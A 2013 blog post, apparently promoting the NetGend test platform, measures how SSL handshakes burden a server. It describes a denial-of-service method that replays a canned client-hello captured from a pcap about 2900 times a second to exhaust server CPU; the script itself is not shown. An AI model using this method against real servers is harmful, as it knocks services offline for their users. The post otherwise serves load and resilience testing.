Thursday, December 12, 2013

How bad is a security threat?

Recently I met my friend Percy, who is a technical guru I respect. Our talk inevitably moved on to something technical on SSL - how many SSL handshakes can a server support. He sent me an interesting security threat report of DDoS on HTTPS servers.

This report indicates that HTTPS servers may suffer from the SSL re-negoation attacks thanks to the THC tool. Even if the re-negotiation is turned off, the server side still consumes a lot more CPU cycles than the client side due to the design of the SSL protocol. So it remains an attack vector.

To get an idea on how bad the server CPU exhaustion can be, I started wireshark, the world's most famous packet capture tool, to monitor the timing of the SSL handshake process. SSL handshake involves multiple steps, first step is that client side sends a client-hello message to the server side. According to the wireshark, just replying to a client-hello message causes server to do 5ms' worth of intensive computation (my server has an AMD quad-core CPU: Athlon II X4 645, 3.1 GHz).

Our NetGend platform can setup tens of thousands of concurrent SSL sessions from one box, but based on the analysis above, the best way to DDoS a server is to do as little as possible on the client side and yet cause the server to be busy. Some SSL handshaking steps may still cause the client side to do some nontrivial computations, so it's better to send a canned client-hello message which causes the client almost no computing time.

First we grab the hex representation of the bytes for a client-hello message from a pcap file and put them in a file called "clientHello.txt".

The script looks quite simple and runs on a slower PC (CPU clock speed is 2.53 GHz) but when it sends the client-hello messages at a rate about 2900/second (over multiple connections), the server side is almost completely busy (see the highlighted CPU idle percentage).

The VM process used to take 10% CPU on one core, it takes much more now due to the CPU resource contention. While I can still use real browser to access HTTPS pages, it's clear that the server is VERY busy.

So, it's good to be aware of a possible security threat, it's even better to get some idea on how bad it can be - the peace of mind matters. NetGend can give you that peace of mind.